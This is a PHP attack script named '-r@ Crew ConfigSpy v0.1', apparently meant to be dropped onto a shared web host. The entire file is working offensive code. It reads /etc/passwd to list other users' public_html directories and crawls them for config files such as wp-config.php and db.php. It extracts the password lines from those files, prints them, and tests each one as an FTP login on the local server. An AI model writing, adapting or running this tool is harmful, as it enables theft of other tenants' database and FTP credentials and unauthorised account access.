1. <?php
  2. echo "<html>";
  3. echo "<title>-r@ Crew ConfigSpy v0.1</title><body>";
  4.  
  5. set_time_limit(0);
  6. ##################
  7. @$passwd=fopen('/etc/passwd','r');
  8. if (!$passwd) {
  9.    echo "[-] Error : coudn't read /etc/passwd";
  10.    exit;
  11. }
  12. $path_to_public=array();
  13. $users=array();
  14. $pathtoconf=array();
  15. $i=0;
  16.  
  17. while(!feof($passwd)) {
  18.   $str=fgets($passwd);
  19.   if ($i>35) {
  20.     $pos=strpos($str,":");
  21.     $username=substr($str,0,$pos);
  22.     $dirz="/home/$username/public_html/";
  23.     if (($username!="")) {
  24.         if (is_readable($dirz)) {
  25.             array_push($users,$username);
  26.             array_push($path_to_public,$dirz);
  27.         }
  28.     }
  29.   }
  30.   $i++;
  31. }
  32. ###################
  33.  
  34. #########################
  35. echo "<br><br>";
  36. echo "<textarea name='main_window' cols=100 rows=20>";
  37.  
  38. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
  39. echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories\n";
  40.  
  41. echo "[~] Searching for passwords in config.* files...\n\n";
  42. foreach ($users as $user) {
  43.         $path="/home/$user/public_html/";
  44.         read_dir($path,$user);
  45. }
  46.  
  47. echo "\n[+] Done\n";
  48.  
  49. function read_dir($path,$username) {
  50.     if ($handle = opendir($path)) {
  51.         while (false !== ($file = readdir($handle))) {
  52.               $fpath="$path$file";
  53.               if (($file!='.') and ($file!='..')) {
  54.                  if (is_readable($fpath)) {
  55.                     $dr="$fpath/";
  56.                     if (is_dir($dr)) {
  57.                        read_dir($dr,$username);
  58.                     }
  59.                     else {
  60.                          if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or 
  61. ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) {
  62.                             $pass=get_pass($fpath);
  63.                             if ($pass!='') {
  64.                                echo "[+] $fpath\n$pass\n";
  65.                                ftp_check($username,$pass);
  66.                             }
  67.                          }
  68.                     }
  69.                  }
  70.               }
  71.         }
  72.     }
  73. }
  74.  
  75. function get_pass($link) {
  76.     @$config=fopen($link,'r');
  77.     while(!feof($config)) {
  78.         $line=fgets($config);
  79.         if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) {
  80.             if (strrpos($line,'"'))
  81.                $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
  82.             else
  83.                $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
  84.             return $pass;
  85.         }
  86.     }
  87. }
  88.  
  89. function ftp_check($login,$pass) {
  90.      @$ftp=ftp_connect('127.0.0.1');
  91.      if ($ftp) {
  92.         @$res=ftp_login($ftp,$login,$pass);
  93.         if ($res) {
  94.            echo '[FTP] '.$login.':'.$pass."  Success\n";
  95.         }
  96.         else ftp_quit($ftp);
  97.      }
  98. }
  99.  
  100. echo "</textarea><br>";
  101.  
  102. echo "</body></html>";
  103. ?>